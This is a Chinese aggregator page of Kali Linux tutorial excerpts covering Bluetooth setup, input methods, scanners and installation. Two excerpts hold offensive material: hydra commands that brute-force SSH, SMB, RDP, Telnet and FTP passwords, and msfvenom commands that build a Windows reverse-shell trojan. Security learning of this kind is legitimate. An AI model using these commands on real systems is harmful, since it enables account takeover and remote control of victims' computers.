kali

Kali Linux 蓝牙的使用

匿名 (未验证) 提交于 2019-12-02 21:56:30
gnome自带了蓝牙的的图形界面gnome-bluetooth,所以只需要设置使用即可 1 查看蓝牙设备是否被rfkill锁住 rfkill list 蓝牙的部分如果是两个no就可以,如果有yes 则继续输入 rfkill unclock bluetooth 2 开启蓝牙服务(kali linux蓝牙服务默认是关闭的 并且也不建议将蓝牙服务设置开机自启动) ls -l /usr/sbin/bluetoothd 查看该文件是否有执行权限 有执行权限就可以执行service bluetooth start 即可开启蓝牙服务 3 在gnome设置中(桌面右上角状态栏下拉菜单中有个扳手按钮)点开,找到蓝牙,然后右边面板打开开关,即可自动搜索周围设备,根据需要连接即可 转载请标明出处: Kali Linux 蓝牙的使用 文章来源: Kali Linux 蓝牙的使用

Kali Linux 2019.2安装谷歌输入法

匿名 (未验证) 提交于 2019-12-02 21:56:30
前言 Linux下常用的中文输入法平台有IBus、fcitx和scim。scim现在维护滞后,不推荐使用。 Fcitx (Flexible Input Method Framework) ――即小企鹅输入法,它是一个以 GPL 方式发布的输入法平台(即原来的 G 五笔),包括五笔、拼音(全拼和双拼)、二笔、区位等输入模块,支持简入繁出,是在 Linux 操作系统中常用的中文输入法。它的优点是,短小精悍、跟程序的兼容性比较好。 安装 apt-get install fcitx fcitx-googlepinyin 配置 im-config 重启服务器 reboot 配置输入法 测试输入法 (使用Ctrl +Space切换) 文章来源: Kali Linux 2019.2安装谷歌输入法

kali linux安全***

匿名 (未验证) 提交于 2019-12-02 21:56:30
kali linux安全***测试 搭建 测试环境 许多提供安全服务的机构会使用一些术语,如安全审计、网络或风险评估、以及 测试。这些术语在含义上有一些重叠,从定义上来看,审计是对系统或应用的量化的技术评估。安全评估意为对风险的评测,是指用以系统、应用和过程中存在的漏洞的服务。***测试的含义则不只是评估、它会用以发现的漏洞来进行测试,以验证该漏洞是否真的存在。 什么是 测试 测试并没有一个标准的定义。国外一些安全组织达成共识的通用说法是, 测试是通过模拟恶意 的 方法,来评估计算机网络系统安全的一种评估方法。这个过程包括对系统的任何特点、技术缺陷或漏洞的主动分析。这个分析是从一个 者可能存在的位置来进行的,并且从这个位置有条件主动利用安全漏洞。 测试与其他评估方法不同。通常的评估方法是根据已知信息资源或者其他被评估对象,去发现所有相关的安全问题。 测试是根据已知可利用的安全漏洞。去发现是否存在相应的信息资源。相比较而言,通常评估方法对评估结果更具有全面性,而 测试更注重安全漏洞的严重性。 通常在 测试时,使用两种***测试方法,分别是黑盒测试盒白盒测试。 升级安装kali linux操作系统 由于linux操作系统是开源系统,所以每天都会有新的软件出现,而且linux发行套件和内核也在不断更新。所以通过对linux软件包进行更新,就可以马上使用最新软件。如果当前软件版本较低

Kali学习笔记24:Nikto、Skipfish

匿名 (未验证) 提交于 2019-12-02 21:53:52
文章的格式也许不是很好看,也没有什么合理的顺序 完全是想到什么写一些什么,但各个方面都涵盖到了 能耐下心看的朋友欢迎一起学习,大牛和杠精们请绕道 实验环境: Kali机器IP:192.168.163.132 Metasploitable机器IP:192.168.163.129 下面我介绍几个工具:Nikto、Skipfish Nikto了解即可,重点要学会使用Skipfish Nikto: 一个Perl语言编写的扫描器,小巧便捷,弱点:1.功能有限、2.命令行工具通病,结果不便查看 指定IP地址和端口: nikto也支持HTTPS扫描: 扫描出来的结果不能说不全面,但是,命令行的形式是真的不方便看: 有一个参数可以把这个导出来:-output,但我感觉并不能从本质上改变什么 nikto还可以和nmap结合: 我这一行的意思:nmap扫描某个网段,把所有开放80端口的主机再交给nikto进行扫描 使用代理: Nikto可以实现HTTP身份认证・,然而现在的HTTP认证方式罕见 下面这个工具相对于Nikto来说,界面会美观很多 Skipfish: C语言编写,虽说也是一个命令行的扫描器,但界面更友好,功能比较强大,我喜欢用 扫描完之后,结果是一个网页的形式,比较美观的 速度较快,误报几率低,基于字典而递归爬网 使用Skipfish要注意必须使用:-o参数,输出 使用: skipfish

Kali Linux 下载、引导、安装

匿名 (未验证) 提交于 2019-12-02 21:53:52
下载卡莉 Linux 官方镜像: https://www.kali.org/downloads/ 官方虚拟机镜像: https://www.offensive-security.com/kali-linux-vm-vmware-virtualbox-hyperv-image-download/ 在 虚拟机 引导 Kali 选择自定义安装,点击下一步。 选择稍后安装操作系统。 选择 Linux操作系统,版本选择其他 Linux4.x或更高版本内核。 为虚拟机命名并设置存放位置。 指定虚拟机内存大小及网络模式。 选择磁盘类型及创建新的虚拟磁盘。 指定磁盘容量大小,并将虚拟磁盘存储为单个文件,点击下一步。 为虚拟机指定操作系统镜像。 安装 Kali L inux 1) 选择 Graphical install 图形化界面安装,在这个阶段 , Linux 内核还没有加载 ;此菜单允许您选择要引导的内核。 ʵʱ (故障安全 现场 (法医 ) -靴子不安装任何东西 , 适合法医工作。取证。 ʵʱ USB 持久性 (和加密 ) -只需添加所需的分区 , 启动菜单就可以持久化。 GUI 安装模式 硬件检测工具 -旨在显示低级硬件信息。 内存诊断 -erm, 诊断内存? 2)选择中文简体语言。 3)选择国家。 4)选择键盘布局。 5)配置一个主机名。 6)配置域名,没有点击继续。 7)设置

win10安装kali组双系统

匿名 (未验证) 提交于 2019-12-02 21:53:52
一.镜像下载: 根据需求下载自己需要的版本 二.烧录: 这里推荐用 尝试了好几款烧录工具,这个是相对最稳定的 打开win32后 第一步 选中镜像位置 ,第二步 选择要烧录的U盘的盘符 比如U盘是E盘,就选E ,第三步 点击写入 过程可能有两三分钟 烧录完成之后 把U盘拔出 三.安装: 在这里说一下 win10 的安装kali方法, 由于win10 是uefi启动 所以需要手动修改为legacy启动 不同电脑进BIOS方法不同,我以ThinkPad为例 开机点F1可以进入bios然后选择Restart,把OS Optimized Defaults改成disabled 然后按下F9 恢复bios设置;startup 里面把uefi/legacy boot 改成legacy only 最后F10保存 重启按f12 选择你的启动U盘 进入到kali安装界面 选择可视化安装 磁盘分区部分 : 如果想要把kali装到一整个硬盘中,可以直接选择使用整个磁盘,注意不要把win10系统盘格式化了就好 由于我是从主盘分出来了20g,所以我选择手动安装 选择分区设定结束 结束分区并将修改写入磁盘 这里选择 否 不使用 安装GRUB 文章来源: win10安装kali组双系统

kali linux学习笔记

匿名 (未验证) 提交于 2019-12-02 21:53:52
ARP欺骗:netfuck 需先安装wpcapinstall 来源ip就是目标要欺骗的ip 目标ip是本机网关 双向欺骗 爆破常见服务: smb telnet ftp 3389 mssql mysql kali linux工具: hydra 爆破ssh密码:hydra -L users.txt -P password.txt -vV -o ssh.log -e ns IP ssh 破解smb:hydra -l administrator -P pass.txt IP smb 爆破rdp:hydra IP rdp -l administrator -P pass.txt -V 破解telnet:hydra IP telnet -l 用户 -P 密码字典 -t 32 -s 23 -e ns -f -V 破解ftp:hydra IP ftp -l 用户名 -P 密码字典 -t 线程(默认16) -vV hydra IP ftp -l 用户名 -P 密码字典 -e ns -W 破解cisco:hydra -P pass.txt IP cisco hydra -m cloud -P pass.txt IP cisco-enable metasploit: msf基础 运行 msfconsole 打开msf命令控制接口 ?或help打开帮助 telnet 进入×××模块 :use

Kali学习笔记-day01

青春壹個敷衍的年華 提交于 2019-12-02 19:26:20
Kali系统是基于DEBIAN的, 和我熟悉的Cetnos很多命令不同, 下面做一些学习记录 1. 修改KALI系统的ip和dns 修改ip  vi /etc/network/interfaces ``` #Loop回环地址 auto lo iface lo inet loopback #将网卡eth0设置为静态IP auto eth0 iface eth0 inet static #修改IP、子网掩码、网关 address XX.XX.XX.XX netmask XX.XX.XX.XX gateway XX.XX.XX.XX ``` (2)DHCP自动获取IP: ``` #Loop回环地址 auto lo iface lo inet loopback #将网卡eth0设置为DHCP自动获取 auto eth0 iface eth0 inet dhcp ``` 修改DNS vi /etc/resolv.conf 输入 nameserver xxx.xxx.xxx.xxx 最后重启网卡服务 /etc/init.d/networking restart 2. 添加源 默认的kali官方源和其他大学的源在我这里用不了,解决方法: vi /etc/apt/source.list 添加一行 deb http://old.kali.org/kali sana main non-free

使用kali生成远控payload

一个人想着一个人 提交于 2019-12-02 17:23:25
  kali linux中的metasploit框架是优秀的渗透框架之一,今天记载一下使用kali生成windows远控木马的过程   生成payload使用的工具是MSFVenom,我们输入msfvenom之后会显示出它的基本参数 在这里我们没有设置参数,所以第一行出现了一个错误 这里我们主要讲windows下payloads的生成和利用,在第五行里面我们看到已经给出了一个生成payload的例子,这个例子生成的就是windwos下的木马   即:  Example: /usr/bin/msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> -f exe -o payload.exe  给出的例子里面没有写端口号,我们修改一点成为下面这个:  msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > ./Cl0ud.exe  LHOST就是你kali的ip地址,LPORT就是想要让kali监听用哪一个端口来监听这个shell,然后将这个生成的exe文件输出到当前目录下Cl0ud.exe  我这里kali是内网地址:10.10.10.128,监听端口是1234

定制 Kali Linux Live USB 的另一种方法

半世苍凉 提交于 2019-12-02 16:56:22
原理 前文 脱离了广大机械硬盘和 USB 2.0 群众的实际情况,是不得人心的。下面介绍一种更加符合科学发展观的定制方法。 启动时,GRUB 或 extlinux 引导 /live/vmlinuz 和 /live/initrd.img, initrd.img 初始化之后会寻找 /live 目录下以 squashfs ext2 ext3 ext4 xfs jffs2 后缀的文件和以 .dir 为后缀的目录,然后将它们 union mount 成根目录。union filesystem,联合文件系统是将多个文件夹联合挂载在一个文件夹下,对联合目录的读写作用在指定为 rw 的分支目录上。 #initrd.img/bin/boot/9990-overlay.sh: 69 if [ -n "${addimage_directory}" ] && [ -d "${addimage_directory}" ] 70 then 71 for FILESYSTEM in squashfs ext2 ext3 ext4 xfs jffs2 dir 72 do 73 for IMAGE in "${addimage_directory}"/*."${FILESYSTEM}" 74 do 75 if [ -e "${IMAGE}" ] 76 then 77 image_string="${image